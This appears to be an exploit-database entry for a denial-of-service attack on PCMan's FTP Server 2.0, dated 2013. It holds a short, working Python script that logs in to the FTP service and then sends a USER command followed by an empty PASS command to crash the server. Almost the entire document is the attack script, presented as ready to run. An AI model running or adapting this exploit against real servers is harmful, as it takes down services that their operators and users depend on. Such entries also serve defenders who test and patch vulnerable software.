Send an empty password to PCMan's FTP Server version 2.0 triggers a denial of service condition.
5c6bc2540fe27f8b6ae22a14eac60214f4d64052fc02c888492e8709cf10aec6
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Empty Password Denial of Service
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
#Description:
# A vulnerability has been identified in PCMan's FTP Server 2.0,
# which allows attackers cause a Denial of Service using a
# specially crafted request(empty Password).
#
####################################################################
import socket
import sys
USER="chako"
PASSWD="chako"
print("\n\n[+] PCMan's FTP Server 2.0 Empty Password Denial of Service")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
data = s.recv(1024)
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
print("[-] Sending exploit...\n")
s.send("USER TEST\r\n'")
s.send("PASS \r\n'")
s.close()
print("[!] Done! Exploit successfully sent\n")